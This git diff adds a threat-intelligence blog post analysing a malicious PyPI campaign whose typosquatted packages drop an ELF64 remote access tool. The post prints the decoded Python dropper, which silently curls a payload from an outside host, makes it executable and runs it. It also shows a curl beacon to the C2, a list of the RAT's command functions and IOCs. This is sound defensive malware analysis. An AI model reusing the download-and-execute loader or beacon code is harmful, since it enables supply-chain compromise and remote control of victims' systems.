diff --git a/src/assets/images/network-rat.jpg b/src/assets/images/network-rat.jpg new file mode 100644 index 0000000..7545801 Binary files /dev/null and b/src/assets/images/network-rat.jpg differ diff --git a/src/content/post/elf64-rat-malware.md b/src/content/post/elf64-rat-malware.md new file mode 100644 index 0000000..1192c5c --- /dev/null +++ b/src/content/post/elf64-rat-malware.md @@ -0,0 +1,109 @@ +--- +publishDate: 2024-02-29T00:00:00Z +title: Novel ELF64 Remote Access Tool Embedded in Malicious PyPI Uploads +excerpt: Analyzing a Linux-targeted malware campaign on the Python Package Index. +category: Threat Intelligence +image: ~/assets/images/network-rat.jpg +tags: + - malware + - threat intelligence +--- +## Introduction + +On 19 February, Vipyr Security scanning services notified us of a malicious upload to the Python Package Index by the name `real-ids`. This Python package, and subsequent uploads attributed to the same threat actor, contains 'remote access tool' capabilities-- that is, remote code execution, remote file upload and download, and a beaconing service to an HTTPS-based C2. + +**Packages:** + +- `real-ids@0.0.1` 19 February 2024 @ 01:47 PM UTC +- `real-ids@0.0.2` 19 February 2024 @ 01:52 PM +- `real-ids@0.0.3` 20 February 2024 @ 01:43 AM +- `real-ids@0.0.4` 20 February 2024 @ 02:24 AM +- `real-ids@0.0.5` 20 February 2024 @ 02:30 AM +- `coloredtxt@0.0.1` 20 February 2024 @ 07:27 AM (Benign) +- `coloredtxt@0.0.2` 20 February 2024 @ 08:55 AM +- `beautifultext@0.0.1`20 February 2024 @ 11:17 AM +- `minisound@0.0.1` 21 February 2024 @ 12:51 AM (Benign) +- `minisound@0.0.2` 28 February 2024 @ 12:43 AM + +## Analysis + +The malicious payload is placed in `os.py` files within typos of popular packages. During the initialization of the file, an import is made from the `os.py` file, executing the payload. Payload occurs in a string of multiple base64/hex encodings, which are decoded and then executed. + +```python +platform = sys.platform[0:1] +print(sys.argv[0]) +if platform != "w": + try: + url = 'hxxps://arcashop.org/boards.php?type=' + platform + local_filename = os.environ['HOME'] + '/oshelper' + os.system("curl --silent " + url + " --cookie 'oshelper_session=10237477354732022837433' --output " + local_filename) + sleep(3) + + os.system("chmod +x " + local_filename) + os.system(local_filename + " > /dev/null 2>&1 &") + except ZeroDivisionError as error: + sleep(0) + finally: + sleep(0) +``` + + Curl is invoked silently with `os.system` and the `--cookie 'oshelper_session=10237477354732022837433` parameter set, and the payload is downloaded from the PyPI Online or Arcashop domain. Interestingly, the first character of the result of `sys.platform` is passed as a parameter to the API, and will not function if the system is not Linux. + +We've noted two endpoints that this malware connects to to obtain the payload: + +- `hxxps://pypi.online/cloud.php?type=` +- `hxxps://arcashop.org/boards.php?type=` + +This was resistant to many our efforts to download when utilizing mobile, residential, cloud, and business/education VPN tunnels. + +Various Python-based payloads have been detected, including encoding the payload itself in base64. This trait was observed with the `pypi.online` endpoint, but not the `arcashop.org` endpoint. + +The payload itself is an ELF64 which contains static linking to libcurl as well as several handcrafted functions: + +- **XEncoding:** An XOR encryption function with a custom XOR table. +- **AcceptRequest:** Primary means to take payloads from C2. +- **FConnectProxy:** Resolves user parameters for `SendPost` function and time seeds random sources. +- **SendPost:** Primary beacon function with custom user agents. Also contains user agent information for the request. Attempts to communicate via HTTPS and falls back to HTTP. + +The payload itself also contains several functions specifically related to interactions with the C2 itself: + +- **Ping:** Send a 'Success' response to C2. +- **MsgDown**: Upload Files +- **MsgUp**: Download Files +- **MsgCmd**: run command with commandline `%s 2>&1 &` and send results back to C2. +- **MsgRun**: run command with commandline `%s 2>&1 &` and do not send results to C2. + +```bash +curl -A "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5786.212 Safari/537.36" \ +-H "Content-Type: application/x-www-form-urlencoded" \ +-H "Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*" \ +-H "Connection: Keep-Alive" \ +--data "lkjyhnmiop=????&odldjshrn=????&ikdiwoep=????" \ +--max-time 300 \ +-k -v \ +"hxxps://jdkgradle.com/jdk/update/check" +``` + +*Note: The data parameters passed in the POST form data are based on time-seeded random and a parameter the author calls 'tuid' (time-based user ID, presumably).* + +The payload will respond with two codes back to the API: + +- `0x89a:` Success +- `0x89b:` Failure + +The payload will beacon to `hxxps://jdkgradle.com/jdk/update/check` every 100 seconds to receive commands from the C2. + +## Indicators of Compromise (IOCs) + +```text +Dropped File Location: ~/oshelper +SHA256 973f7939ea03fd2c9663dafc21bb968f56ed1b9a56b0284acf73c3ee141c053c +MD5 33c9a47debdb07824c6c51e13740bdfe +pypi.online 198.54.115.27 +arcashop.org 68.65.120.235 +jdkgradle.com 199.188.200.88 +``` + +## Closing Remarks + +All packages have been reported to and removed by the Python Package Index administrators. A special thanks to our friends at [Phylum](https://www.phylum.io/) for helping us with the initial payload, security administrators at PyPI for their rapid handling of our reports, and Vipyr Security community contributors for the reversal and analysis of the malicious code.